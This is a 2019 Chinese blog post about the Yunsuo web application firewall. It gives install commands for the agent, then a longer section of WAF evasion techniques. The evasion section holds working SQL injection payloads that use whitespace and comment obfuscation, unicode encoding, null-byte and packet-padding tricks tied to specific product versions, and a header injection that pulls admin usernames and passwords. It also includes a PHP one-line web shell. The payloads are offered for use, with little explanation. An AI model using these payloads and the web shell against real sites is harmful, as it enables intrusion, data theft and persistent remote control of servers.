应用安全-安全设备-Waf系列-软Waf-云锁

安装

安装 - Linux

前提:
检查selinux状态 - 关闭selinux getenforce #显示为disabled则为关闭 1.下载 x86:wget http://download.yunsuo.com.cn/v3/yunsuo_agent_32bit.tar.gz && tar xvzf yunsuo_agent_32bit.tar.gz && chmod +x yunsuo_install/install && yunsuo_install/install x64:wget http://download.yunsuo.com.cn/v3/yunsuo_agent_64bit.tar.gz && tar xvzf yunsuo_agent_64bit.tar.gz && chmod +x yunsuo_install/install && 2.解压 chmod +x yunsuo_install/install 3.在当前路径下执行安装 yunsuo_install/install 4.添加服务器到云中心。 /usr/local/yunsuo_agent/yunsuo_smart_tool.sh -u cloud_name -p cloud_passwd 注:cloud_name:云中心账户名;cloud_passwd:云中心登录密码 5.查看状态 ps -ef | grep yunsuo_agent 相关命令 云锁启动/停止/重启/运行状态 service yunsuo start/stop/restart/status /etc/init.d/yunsuo start/stop/restart/status 卸载 /usr/local/yunsuo_agent/uninstall

安装 - Windos

下载
http://download.yunsuo.com.cn/v3/%E4%BA%91%E9%94%81%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF(%E5%AE%89%E8%A3%85%E5%9C%A8%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A).exe

免杀

GET POST转换 + 空格替换
针对过滤不完全情况

搜索框 + SQL注入 + 字符型
?type=2%0A%09%0B%0C%0D/**//**//**//**//**//**//**/and%0A%09%0B%0C%0D/**//**//**//**//**//**//**/(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/1%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/count(*),concat(user(),floor(rand(0)*2))x%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from%0A%09%0B%0C%0D/**//**//**//**//**//**//**/information_schema.tables%0A%09%0B%0C%0D/**//**//**//**//**//**//**/group%0A%09%0B%0C%0D/**//**//**//**//**//**//**/by%0A%09%0B%0C%0D/**//**//**//**//**//**//**/x)y)%23

?type=2%0A%09%0B%0C%0D/**//**//**//**//**//**//**/and%0A%09%0B%0C%0D/**//**//**//**//**//**//**/(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/1%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/count(*),concat(user(),floor(rand(0)*2))x%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from%0A%09%0B%0C%0D/**//**//**//**//**//**//**/information_schema.tables%0A%09%0B%0C%0D/**//**//**//**//**//**//**/group%0A%09%0B%0C%0D/**//**//**//**//**//**//**/by%0A%09%0B%0C%0D/**//**//**//**//**//**//**/x)y)%23

union select  +  ()绕过

?id=-1union(select 1,2,3,@@datadir,5,6,7,8,9,10,11,12,13,14,15,16,17)

union select + '' + /**/ + ) + # 绕过

?id='/*')union select user,database() from users%23*/&submit=Submit#

IIS + 字符编码绕过 - unicode

asp?t=112 %u00aand(s%u00f0lect top 1 eventname_en from eventshelp) > 0

WideChar和MultiByte字符转换问题 - 2002年

一句话 + 菜刀 绕过

<?php<br>
$_REQUEST['a']($_REQUEST['b']);<br>
?>

1.3.145版本 - 包冗余绕过

超过7250byte的部分不被检测

1.3.145版本 - \x00 绕过

GET型
def getdata(n):
    data = 'name=\x00test'
    data += '&id=select 1 from table'
    return data

POST型
def postdata(n)
    data = '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
    data += '------'WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
    data += '%27abcd\r\n'
    data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
    data += 'Content-Disposition: form-data; name="submit"\r\n\r\n'
    data += 'select 1 from table\r\n'
    data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
    return data

COOKIE型
header = {
    'User-Agent' : 'letmetest',
    'Content-Type' : 'multipart/form-data: boundary=----WebKitFormBoundarycMYRelX1B2H69xy9'
    'X-forwarded-For' : 'select 1 from table'
}
1.3.145版本 - E0绕过
?id=8E0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

?id=8E0union%20select%201,2,3,admin_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20qs_admin#

1.3.191版本 - E0 + /**/ + current_user 绕过

?id=8E0union/*123*/select/*123*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
?id=8E0union/*123*/select/*123*/1,2,3,current_user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

1.4.121版本 - 默认对post、cookie不检测,对header字段未做防护

Header头 - Client-ip注入
Client-ip: 1.2.3.4     'or @ `'` AND (SELECT 1 FROM (SELECT count(1),concat(round(rand(0)),
(SELECT concat(username,0x23,password) FROM pm_admin LIMIT 0,1)) a FROM information_schema.tables
GROUP by a)b) or @ `'` and ''='

 

 

 

 
posted @ 2019-08-15 15:07  7hang  阅读(686)  评论(0编辑  收藏  举报